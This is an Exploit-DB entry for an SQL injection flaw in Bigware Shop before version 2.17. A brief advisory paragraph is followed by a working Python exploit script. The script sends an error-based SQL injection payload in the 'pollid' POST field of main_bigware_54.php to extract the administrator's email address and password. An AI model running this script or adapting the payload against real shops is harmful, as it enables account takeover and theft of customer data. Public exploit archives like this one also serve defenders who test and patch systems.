Bigware Shop 2.1x 'main_bigware_54.php' SQL Injection Vulnerability

ID EDB-ID:37354
Type exploitdb
Reporter rwenzel
Modified 2012-06-05T00:00:00


Bigware Shop 2.1x 'main_bigware_54.php' SQL Injection Vulnerability. Webapps exploit for php platform


Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Bigware Shop versions prior to 2.17 are vulnerable. 

# -*- coding: utf-8 -*-
import httplib2
import urllib
import sys

# insert your target link here (with trailing slash)
url = ""
h = httplib2.Http()

# send sql injection
headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
 former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
postdata = {  'voteid' : '2', \
    'pollid' : sqli, \
    'x' : '1', \
    'y' : '1', \
    'forwarder' : ''}
response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
print content, "\n", "\n"
print "If there is an error stating the duplicate admin entry, your shop is vulnerable."